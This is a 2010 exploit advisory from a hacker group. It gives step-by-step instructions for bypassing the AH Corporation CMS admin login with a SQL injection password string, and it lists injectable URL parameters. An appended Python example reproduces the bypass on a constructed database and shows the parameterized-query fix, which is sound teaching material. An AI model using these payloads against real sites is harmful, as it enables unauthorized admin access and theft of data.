AH Corporation CMS suffers from authentication bypass and remote SQL injection vulnerabilities.
#########################################################################
[+] Exploit Title : AH Corporation CMS Multiple Vulnerabilities
[~] Author : ThunDEr HeaD
[~] Contact : thunderhead10@gmail.com
[~] Date : 13-11-2010
[~] HomePage : www.indishell.in
[~] Price : $402 Or Rs.35,000/-
[~] Version : n/a
[~] Software: http://www.ahcorporation.com/webdesigningpackages.htm
[~] Vulnerability Style : Authentication Bypass / SQL Injection (ASP)
#########################################################################
~~~~~~~~~~~~~~~~~~~~~~~~~[Greetz To]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
----== INDIAN CYBER ARMY ==----
We Are: -[SiLeNtp0is0n]- , stRaNgEr , inX_rOot , NEO H4cK3R , DarkL00k , G00g!3 W@rr!0r , str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor , Th3 RDX
shouts to : "Rajputgal Mahi" and all IW members :)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~[EXPLOIT]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---==[Authentication Bypass]==---
[1] Go to the URL:
http://server/cp
[2] Apply these details for login:
Username: admin
Password: ' or 1=1 or ''='
[3] You will be redirected to the Admin page.
[4] Enjoy
---==[SQL Injection(s)]==---
http://server/more.asp?itemCode=1
http://server/products.asp?catID=18
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
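Added example (not part of the original advisory and not the CMS's own code): the advisory does not show the application's queries, so the schema, the query shape and the function names below are assumptions. It shows why the password string from step [2] passes a string-concatenated login check, and how bound parameters plus integer validation for itemCode/catID-style parameters close both issues.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; schema names are assumptions, not the CMS's.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'S3cret-constructed');
        CREATE TABLE items (itemCode INTEGER, name TEXT);
        INSERT INTO items VALUES (1, 'widget'), (2, 'gadget');
    """)  # plaintext password only keeps the demo short; store a salted hash
    return db

def login_concat(db, username, password):
    # Vulnerable pattern: input is spliced into the SQL text, so a quote in
    # the password ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_param(db, username, password):
    # Hardened: placeholders bind input as values, never as SQL syntax.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0

def item_by_code(db, raw_code):
    # Numeric URL parameters: reject anything that is not a plain integer,
    # then still bind the value instead of concatenating it.
    if not re.fullmatch(r"[0-9]{1,9}", raw_code):
        return None
    row = db.execute("SELECT name FROM items WHERE itemCode = ?",
                     (int(raw_code),)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    advisory_password = "' or 1=1 or ''='"   # string from step [2]
    print("concatenated:", login_concat(db, "admin", advisory_password))
    print("parameterized:", login_param(db, "admin", advisory_password))
    print("itemCode '1':", item_by_code(db, "1"))
    print("itemCode '1 or 1=1':", item_by_code(db, "1 or 1=1"))
```

In the concatenated query, AND binds tighter than OR, so the WHERE clause becomes (username match AND empty password) OR 1=1 OR ''='' and is true for every row.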
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 13 November 2010
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#End 0Day#